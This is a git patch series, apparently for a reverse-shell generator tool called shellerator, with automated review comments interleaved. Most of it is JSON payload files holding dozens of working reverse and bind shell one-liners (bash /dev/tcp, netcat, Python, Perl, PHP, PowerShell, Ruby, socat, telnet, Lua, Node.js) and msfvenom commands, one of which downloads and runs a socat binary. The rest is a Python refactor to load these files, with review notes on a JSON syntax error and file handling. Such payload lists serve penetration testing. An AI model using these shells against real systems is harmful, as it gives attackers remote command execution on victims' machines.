From 9579257f852748374c75c6ba6f847be642a9468b Mon Sep 17 00:00:00 2001
From: lapinou
Date: Wed, 17 Apr 2024 01:13:23 +0200
Subject: [PATCH 1/4] Create netcat.json

---
 payloads/netcat.json | 65 ++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 65 insertions(+)
 create mode 100644 payloads/netcat.json

diff --git a/payloads/netcat.json b/payloads/netcat.json
new file mode 100644
index 0000000..b7af32f
--- /dev/null
+++ b/payloads/netcat.json
@@ -0,0 +1,65 @@
+[
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "nc -e /bin/sh {LHOST} {LPORT}",
+    "note": null,
+    "id": "netcat1"
+  },
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "nc -e /bin/bash {LHOST} {LPORT}",
+    "note": null,
+    "id": "netcat2"
+  },
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "nc -c bash {LHOST} {LPORT}",
+    "note": null,
+    "id": "netcat3"
+  },
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "mknod backpipe p && nc {LHOST} {LPORT} 0backpipe",
+    "note": null,
+    "id": "netcat4"
+  },
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} >/tmp/f",
+    "note": null,
+    "id": "netcat5"
+  },
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "rm -f /tmp/p; mknod /tmp/p p && nc {LHOST} {LPORT} 0/tmp/p 2>&1",
+    "note": null,
+    "id": "netcat6"
+  },
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} > f",
+    "note": null,
+    "id": "netcat7"
+  },
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "rm -f x; mknod x p && nc {LHOST} {LPORT} 0x",
+    "note": null,
+    "id": "netcat8"
+  },
+  {
+    "type": "netcat",
+    "direction": "bind",
+    "payload": "nc -lvp {LPORT} -e /bin/sh",
+    "note": null,
+    "id": "netcat9"
+  }
+]

From 50282e25d180b3882e0ba1d67d5036590cd696d1 Mon Sep 17 00:00:00 2001
From: lapinou Date: Wed, 17 Apr 2024 01:21:48 +0200 Subject: [PATCH 2/4] Add files via upload --- payloads/awk.json | 9 ++++ payloads/bash.json | 65 +++++++++++++++++++++++++++ payloads/groovy.json | 16 +++++++ payloads/java.json | 23 ++++++++++ payloads/lua.json | 16 +++++++ payloads/meterpreter.json | 93 +++++++++++++++++++++++++++++++++++++++ payloads/ncat.json | 16 +++++++ payloads/nodejs.json | 23 ++++++++++ payloads/openssl.json | 16 +++++++ payloads/perl.json | 23 ++++++++++ payloads/php.json | 44 ++++++++++++++++++ payloads/powershell.json | 16 +++++++ payloads/python.json | 30 +++++++++++++ payloads/ruby.json | 23 ++++++++++ payloads/socat.json | 30 +++++++++++++ payloads/tclsh.json | 9 ++++ payloads/telnet.json | 30 +++++++++++++ payloads/war.json | 9 ++++ 18 files changed, 491 insertions(+) create mode 100644 payloads/awk.json create mode 100644 payloads/bash.json create mode 100644 payloads/groovy.json create mode 100644 payloads/java.json create mode 100644 payloads/lua.json create mode 100644 payloads/meterpreter.json create mode 100644 payloads/ncat.json create mode 100644 payloads/nodejs.json create mode 100644 payloads/openssl.json create mode 100644 payloads/perl.json create mode 100644 payloads/php.json create mode 100644 payloads/powershell.json create mode 100644 payloads/python.json create mode 100644 payloads/ruby.json create mode 100644 payloads/socat.json create mode 100644 payloads/tclsh.json create mode 100644 payloads/telnet.json create mode 100644 payloads/war.json diff --git a/payloads/awk.json b/payloads/awk.json new file mode 100644 index 0000000..1ee226b --- /dev/null +++ b/payloads/awk.json 
@@ -0,0 +1,9 @@ +[ + { + "type": "awk", + "direction": "reverse", + "payload": "awk 'BEGIN {s = \"/inet/tcp/0/{LHOST}/{LPORT}\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null", + "note": null, + "id": "awk1" + } +] \ No newline at end of file diff --git a/payloads/bash.json b/payloads/bash.json new file mode 100644 index 0000000..9de1a53 --- /dev/null +++ b/payloads/bash.json @@ -0,0 +1,65 @@ +[ + { + "type": "bash", + "direction": "reverse", + "payload": "/bin/bash -c '/bin/bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1'", + "note": null, + "id": "bash1" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "/bin/bash -c '/bin/bash -i > /dev/tcp/{LHOST}/{LPORT} 0<&1 2>&1'", + "note": null, + "id": "bash2" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "/bin/bash -i > /dev/tcp/{LHOST}/{LPORT} 0<& 2>&1", + "note": null, + "id": "bash3" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1", + "note": null, + "id": "bash4" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "exec 5<>/dev/tcp/{LHOST}/{LPORT};cat <&5 | while read line; do $line 2>&5 >&5; done", + "note": null, + "id": "bash5" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "exec /bin/sh 0&0 2>&0", + "note": null, + "id": "bash6" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "0<&196;exec 196<>/dev/tcp/{LHOST}/{LPORT}; sh <&196 >&196 2>&196", + "note": null, + "id": "bash7" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "bash -i >& /dev/udp/{LHOST}/{LPORT} 0>&1", + "note": "UDP", + "id": "bash8" + }, + { + "type": "bash", + "direction": "reverse", + "payload": "nc -u -lvp {LPORT}", + "note": "UDP Listener (attacker)", + "id": "bash9" + } +] \ No newline at end of file 
diff --git a/payloads/groovy.json b/payloads/groovy.json new file mode 100644 index 0000000..078ed21 --- /dev/null +++ b/payloads/groovy.json @@ -0,0 +1,16 @@ +[ + { + "type": "groovy", + "direction": "reverse", + "payload": "String host=\"{LHOST}\";\nint port={LPORT};\nString cmd=\"cmd.exe\";\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();", + "note": null, + "id": "groovy1" + }, + { + "type": "groovy", + "direction": "reverse", + "payload": "Thread.start { // Reverse shell here }", + "note": "More stealthy", + "id": "groovy2" + } +] \ No newline at end of file diff --git a/payloads/java.json b/payloads/java.json new file mode 100644 index 0000000..f4ab935 --- /dev/null +++ b/payloads/java.json 
@@ -0,0 +1,23 @@ +[ + { + "type": "java", + "direction": "reverse", + "payload": "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/{LHOST}/{LPORT};cat <&5 | while read line; do $line 2>&5 >&5; done\"] as String[])\np.waitFor()", + "note": null, + "id": "java1" + }, + { + "type": "java", + "direction": "reverse", + "payload": "String host=\"{LPORT}\";\nint port={LPORT};\nString cmd=\"cmd.exe\";\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();", + "note": null, + "id": "java2" + }, + { + "type": "java", + "direction": "reverse", + "payload": "Thread thread = new Thread(){public void run(){ //Reverse shell here }}thread.start();", + "note": "More stealthy", + "id": "java3" + } +] \ No newline at end of file diff --git a/payloads/lua.json b/payloads/lua.json new file mode 100644 index 0000000..f95ce3e --- /dev/null +++ b/payloads/lua.json 
@@ -0,0 +1,16 @@ +[ + { + "type": "lua", + "direction": "reverse", + "payload": "lua -e \"require('socket');require('os');t=socket.tcp();t:connect('{LHOST}','{LPORT}');os.execute('/bin/sh -i <&3 >&3 2>&3');\"", + "note": "Linux", + "id": "lua1" + }, + { + "type": "lua", + "direction": "reverse", + "payload": "lua5.1 -e 'local host, port = \"{LHOST}\", {LPORT} local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \"r\") local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()' ", + "note": "Windows", + "id": "lua2" + } +] \ No newline at end of file diff --git a/payloads/meterpreter.json b/payloads/meterpreter.json new file mode 100644 index 0000000..a695252 --- /dev/null +++ b/payloads/meterpreter.json 
@@ -0,0 +1,93 @@ +[ + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f elf > shell.elf", + "note": null, + "id": "meterpreter1" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p windows/meterpreter/reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f exe > shell.exe", + "note": null, + "id": "meterpreter2" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p osx/x86/shell_reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f macho > shell.macho", + "note": null, + "id": "meterpreter3" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p windows/meterpreter/reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f asp > shell.asp", + "note": null, + "id": "meterpreter4" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p java/jsp_shell_reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f raw > shell.jsp", + "note": null, + "id": "meterpreter5" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p java/jsp_shell_reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f war > shell.war", + "note": null, + "id": "meterpreter6" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p cmd/unix/reverse_python LHOST=\"{LHOST}\" LPORT={LPORT} -f raw > shell.py", + "note": null, + "id": "meterpreter7" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p cmd/unix/reverse_bash LHOST=\"{LHOST}\" LPORT={LPORT} -f raw > shell.sh", + "note": null, + "id": "meterpreter8" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p cmd/unix/reverse_perl LHOST=\"{LHOST}\" LPORT={LPORT} -f raw > shell.pl", + "note": null, + "id": "meterpreter9" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p windows/meterpreter/reverse_tcp LHOST={LHOST} 
LPORT={LPORT} -f exe > reverse.exe", + "note": "Windows Staged reverse TCP", + "id": "meterpreter10" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p windows/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe > reverse.exe", + "note": "Windows Stageless reverse TCP", + "id": "meterpreter11" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf >reverse.elf", + "note": "Linux Staged reverse TCP", + "id": "meterpreter12" + }, + { + "type": "meterpreter", + "direction": "reverse", + "payload": "msfvenom -p linux/x86/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf >reverse.elf", + "note": "Linux Stageless reverse TCP", + "id": "meterpreter13" + } +] \ No newline at end of file diff --git a/payloads/ncat.json b/payloads/ncat.json new file mode 100644 index 0000000..af425dc --- /dev/null +++ b/payloads/ncat.json @@ -0,0 +1,16 @@ +[ + { + "type": "ncat", + "direction": "reverse", + "payload": "ncat {LHOST} {LPORT} -e /bin/bash", + "note": null, + "id": "ncat1" + }, + { + "type": "ncat", + "direction": "reverse", + "payload": "ncat --udp {LHOST} {LPORT} -e /bin/bash", + "note": null, + "id": "ncat2" + } +] \ No newline at end of file diff --git a/payloads/nodejs.json b/payloads/nodejs.json new file mode 100644 index 0000000..0e9c202 --- /dev/null +++ b/payloads/nodejs.json 
@@ -0,0 +1,23 @@ +[ + { + "type": "nodejs", + "direction": "reverse", + "payload": "require('child_process').exec('nc -e /bin/sh {LHOST} {LPORT}')", + "note": null, + "id": "nodejs1" + }, + { + "type": "nodejs", + "direction": "reverse", + "payload": "-var x = global.process.mainModule.require\n-x('child_process').exec('nc {LHOST} {LPORT} -e /bin/bash')", + "note": null, + "id": "nodejs2" + }, + { + "type": "nodejs", + "direction": "reverse", + "payload": "(function(){\n var net = require(\"net\"),\n cp = require(\"child_process\"),\n sh = cp.spawn(\"/bin/sh\", []);\n var client = new net.Socket();\n client.connect({LPORT}, \"{LHOST}\", function(){\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n });\n return /a/; // Prevents the Node.js application form crashing\n})();", + "note": null, + "id": "nodejs3" + } +] \ No newline at end of file diff --git a/payloads/openssl.json b/payloads/openssl.json new file mode 100644 index 0000000..ee7c6e8 --- /dev/null +++ b/payloads/openssl.json @@ -0,0 +1,16 @@ +[ + { + "type": "openssl", + "direction": "reverse", + "payload": "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {LHOST}:{LPORT} > /tmp/s; rm /tmp/s", + "note": null, + "id": "openssl1" + }, + { + "type": "openssl", + "direction": "reverse", + "payload": "ncat --ssl -vv -l -p {LPORT}", + "note": "Listener (attacker)", + "id": "openssl2" + } +] \ No newline at end of file diff --git a/payloads/perl.json b/payloads/perl.json new file mode 100644 index 0000000..5845700 --- /dev/null +++ b/payloads/perl.json 
@@ -0,0 +1,23 @@ +[ + { + "type": "perl", + "direction": "reverse", + "payload": "perl -e 'use Socket;$i=\"{LHOST}\";$p={LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", + "note": null, + "id": "perl1" + }, + { + "type": "perl", + "direction": "reverse", + "payload": "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{LHOST}:{LPORT}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'", + "note": null, + "id": "perl2" + }, + { + "type": "perl", + "direction": "reverse", + "payload": "perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"{LHOST}:{LPORT}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'", + "note": "Windows", + "id": "perl3" + } +] \ No newline at end of file diff --git a/payloads/php.json b/payloads/php.json new file mode 100644 index 0000000..e738d19 --- /dev/null +++ b/payloads/php.json 
@@ -0,0 +1,44 @@ +[ + { + "type": "php", + "direction": "reverse", + "payload": "php -r '$sock=fsockopen(\"{LHOST}\",{LPORT});exec(\"/bin/sh -i <&3 >&3 2>&3\");'", + "note": null, + "id": "php1" + }, + { + "type": "php", + "direction": "reverse", + "payload": "php -r '$s=fsockopen(\"{LHOST}\",{LPORT});$proc=proc_open(\"/bin/sh -i\", array(0=>$s, 1=>$s, 2=>$s)", + "note": null, + "id": "php2" + } + { + "type": "php", + "direction": "reverse", + "payload": "php -r '$s=fsockopen(\"{LHOST}\",{LPORT});shell_exec(\"/bin/sh -i <&3 >&3 2>&3\");'", + "note": null, + "id": "php3" + }, + { + "type": "php", + "direction": "reverse", + "payload": "php -r '$s=fsockopen(\"{LHOST}\",{LPORT});system(\"/bin/sh -i <&3 >&3 2>&3\");'", + "note": null, + "id": "php4" + }, + { + "type": "php", + "direction": "reverse", + "payload": "php -r '$s=fsockopen(\"{LHOST}\",{LPORT});popen(\"/bin/sh -i <&3 >&3 2>&3\", \"r\");'", + "note": null, + "id": "php5" + }, + { + "type": "php", + "direction": "reverse", + "payload": "php -r '$s='127.0.0.1';$p=443;@error_reporting(0);@ini_set(\"error_log\",NULL);@ini_set(\"log_errors\",0);@set_time_limit(0);umask(0);if($s=fsockopen($s,$p,$n,$n)){if($x=proc_open('/bin/sh$IFS-i',array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$p,getcwd())){stream_set_blocking($p[0],0);stream_set_blocking($p[1],0);stream_set_blocking($p[2],0);stream_set_blocking($s,0);while(true){if(feof($s))die('connection/closed');if(feof($p[1]))die('shell/not/response');$r=array($s,$p[1],$p[2]);stream_select($r,$n,$n,null);if(in_array($s,$r))fwrite($p[0],fread($s,1024));if(in_array($p[1],$r))fwrite($s,fread($p[1],1024));if(in_array($p[2],$r))fwrite($s,fread($p[2],1024));}fclose($p[0]);fclose($p[1]);fclose($p[2]);proc_close($x);}else{die(\"proc_open/disabled\");}}else{die(\"not/connect\");}'", + "note": null, + "id": "php6" + } +] \ No newline at end of file diff --git a/payloads/powershell.json b/payloads/powershell.json new file mode 100644 index 0000000..785df38 --- /dev/null 
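Review bot: `payloads/php.json` is not valid JSON: the object with `"id": "php2"` is closed by `+ }` with no comma before the next `{` that opens the `php3` entry, so `json.load` in `list_shells` will raise `JSONDecodeError` as soon as someone runs the tool with `-t php`. The fix is the single character `},` on that line. Since the rest of this series moves every payload into these files, a small test that runs `json.load` over each file under `payloads/` and checks that every entry carries the `type`, `direction`, `payload`, `note` and `id` keys would catch this class of error before it reaches users.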
+++ b/payloads/powershell.json @@ -0,0 +1,16 @@ +[ + { + "type": "powershell", + "direction": "reverse", + "payload": "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"{LHOST}\",{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()", + "note": null, + "id": "powershell1" + }, + { + "type": "powershell", + "direction": "reverse", + "payload": "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('{LHOST}',{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"", + "note": null, + "id": "powershell2" + } +] \ No newline at end of file diff --git a/payloads/python.json b/payloads/python.json new file mode 100644 index 0000000..a0aceee --- /dev/null +++ b/payloads/python.json 
@@ -0,0 +1,30 @@ +[ + { + "type": "python", + "direction": "reverse", + "payload": "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{LHOST}\",{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", + "note": null, + "id": "python1" + }, + { + "type": "python", + "direction": "reverse", + "payload": "export RHOST=\"{LHOST}\";export RPORT={LPORT};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'", + "note": null, + "id": "python2" + }, + { + "type": "python", + "direction": "reverse", + "payload": "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{LHOST}\",{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'", + "note": null, + "id": "python3" + }, + { + "type": "python", + "direction": "reverse", + "payload": "C:\\Python27\\python.exe -c \"(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('{LHOST}', {LPORT})), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for 
__g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))\"", + "note": "Windows", + "id": "python4" + } +] \ No newline at end of file diff --git a/payloads/ruby.json b/payloads/ruby.json new file mode 100644 index 0000000..e935f03 --- /dev/null +++ b/payloads/ruby.json 
@@ -0,0 +1,23 @@ +[ + { + "type": "ruby", + "direction": "reverse", + "payload": "ruby -rsocket -e'f=TCPSocket.open(\"{LHOST}\",{LPORT}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'", + "note": null, + "id": "ruby1" + }, + { + "type": "ruby", + "direction": "reverse", + "payload": "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"{LHOST}\",\"{LPORT}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", + "note": null, + "id": "ruby2" + }, + { + "type": "ruby", + "direction": "reverse", + "payload": "ruby -rsocket -e 'c=TCPSocket.new(\"{LHOST}\",\"{LPORT}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", + "note": "Windows", + "id": "ruby3" + } +] \ No newline at end of file diff --git a/payloads/socat.json b/payloads/socat.json new file mode 100644 index 0000000..48c1e03 --- /dev/null +++ b/payloads/socat.json @@ -0,0 +1,30 @@ +[ + { + "type": "socat", + "direction": "reverse", + "payload": "/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{LHOST}:{LPORT}", + "note": null, + "id": "socat1" + }, + { + "type": "socat", + "direction": "reverse", + "payload": "socat tcp-connect:{LHOST}:{LPORT} exec:\"bash -li\",pty,stderr,setsid,sigint,sane", + "note": null, + "id": "socat2" + }, + { + "type": "socat", + "direction": "reverse", + "payload": "wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{LHOST}:{LPORT}", + "note": null, + "id": "socat3" + }, + { + "type": "socat", + "direction": "reverse", + "payload": "socat file:`tty`,raw,echo=0 TCP-L:{LPORT}", + "note": "Listener (attacker)", + "id": "socat4" + } +] \ No newline at end of file diff --git a/payloads/tclsh.json b/payloads/tclsh.json new file mode 100644 index 0000000..8450d8e --- /dev/null +++ b/payloads/tclsh.json 
@@ -0,0 +1,9 @@ +[ + { + "type": "tclsh", + "direction": "reverse", + "payload": "echo 'set s [socket {LHOST} {LPORT}];while 42 { puts -nonewline $s \"shell>\";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh", + "note": null, + "id": "tclsh1" + } +] \ No newline at end of file diff --git a/payloads/telnet.json b/payloads/telnet.json new file mode 100644 index 0000000..d6f5a55 --- /dev/null +++ b/payloads/telnet.json @@ -0,0 +1,30 @@ +[ + { + "type": "telnet", + "direction": "reverse", + "payload": "rm -f /tmp/p; mknod /tmp/p p && telnet {LHOST} {LPORT} 0/tmp/p 2>&1", + "note": null, + "id": "telnet1" + }, + { + "type": "telnet", + "direction": "reverse", + "payload": "telnet {LHOST} {LPORT} | /bin/bash | telnet {LHOST} 667", + "note": null, + "id": "telnet2" + }, + { + "type": "telnet", + "direction": "reverse", + "payload": "rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet {LHOST} {LPORT} > f", + "note": null, + "id": "telnet3" + }, + { + "type": "telnet", + "direction": "reverse", + "payload": "rm -f x; mknod x p && telnet {LHOST} {LPORT} 0x", + "note": null, + "id": "telnet4" + } +] \ No newline at end of file diff --git a/payloads/war.json b/payloads/war.json new file mode 100644 index 0000000..c4950e8 --- /dev/null +++ b/payloads/war.json @@ -0,0 +1,9 @@ +[ + { + "type": "war", + "direction": "reverse", + "payload": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f war > reverse.war\nstrings reverse.war | grep jsp # in order to get the name of the file", + "note": null, + "id": "war1" + } +] \ No newline at end of file From dbdc1d80841daddcb7d09f5bb53eb2c24b59bb9f Mon Sep 17 00:00:00 2001 From: lapinou Date: Wed, 17 Apr 2024 01:23:39 +0200 Subject: [PATCH 3/4] Update shellerator.py --- shellerator.py | 167 ++++++++++++------------------------------------- 1 file changed, 39 insertions(+), 128 deletions(-) 
diff --git a/shellerator.py b/shellerator.py
index f2e2c51..a066d8c 100755
--- a/shellerator.py
+++ b/shellerator.py
@@ -16,6 +16,7 @@ import re
 import psutil
 import socket
+import json
 from colorama import Fore
 from colorama import Style
 import platform
 
@@ -24,6 +25,8 @@ else:
     from simple_term_menu import TerminalMenu
 
 
+shells = []
+
 def menu(title, menu_list):
     if platform.system() == 'Windows':
         selection = SelectionMenu.get_selection(menu_list, title=title, show_exit_option=False)
@@ -61,14 +64,19 @@ def select_address():
     return menu_with_custom_choice("Listener interface/address?", menu_list)
 
-def list_shells():
+def list_shells(type):
+    f = open(f"payloads/{type}.json")
+    shells = json.load(f)
+
     print(Fore.BLUE + Style.BRIGHT + 'Reverse shells' + Style.RESET_ALL)
-    for shell in sorted(revshells.keys()):
-        print(' - ' + shell)
+    for shell in shells:
+        if shell['direction'] == 'reverse':
+            print(f"[{shell['id']}] - {shell['payload']}")
     print()
     print(Fore.BLUE + Style.BRIGHT + 'Bind shells' + Style.RESET_ALL)
-    for shell in sorted(bindshells.keys()):
-        print(' - ' + shell)
+    for shell in shells:
+        if shell['direction'] == 'bind':
+            print(f"[{shell['id']}] - {shell['payload']}")
     quit()
 
 
 def get_options():
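Review bot: The module-level `shells = []` introduced by the `+shells = []` lines is dead code: `list_shells` in the next hunk binds a local `shells` from `json.load`, so the global is never read or written and only suggests shared state that does not exist. Unless a later patch in this series uses it, drop the two lines, or have `list_shells` declare `global shells` if the loaded list is meant to be reused elsewhere.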
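Review bot: `list_shells(type)` at `+def list_shells(type):` opens `payloads/{type}.json` with a bare `open` that is never closed, and does not check its argument: `-l` without `-t` passes `None`, so the call dies on `payloads/None.json` with a traceback, as does any type that has no JSON file, whereas the old version listed every known type. The file name is built from a command-line value, so at minimum a `FileNotFoundError`/`ValueError` guard with a readable message is needed; listing the files present under `payloads/` when no type is given would restore the old behaviour, but needs `os` or `glob`, which this hunk does not show imported. `type` also shadows the builtin; the rewrite below renames it (the only caller passes it positionally) and uses `with` so the handle is released.
```python
def list_shells(shell_type):
    # -l without -t leaves TYPE as None; say so instead of opening payloads/None.json
    if not shell_type:
        quit("Pass -t/--type together with -l/--list to choose the payload file to list")
    try:
        with open(f"payloads/{shell_type}.json") as f:
            shells = json.load(f)
    except FileNotFoundError:
        quit(f"No payload file for type '{shell_type}' under payloads/")
    except ValueError as err:  # json.JSONDecodeError is a ValueError
        quit(f"payloads/{shell_type}.json is not valid JSON: {err}")
    # … unchanged: 'Reverse shells' and 'Bind shells' listings …
    quit()
```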
@@ -85,15 +93,20 @@ def get_options():
     # typeoptions and portoption are two options either bindshell or revshell will need (https://stackoverflow.com/questions/23775378/allowing-same-option-in-different-argparser-group)
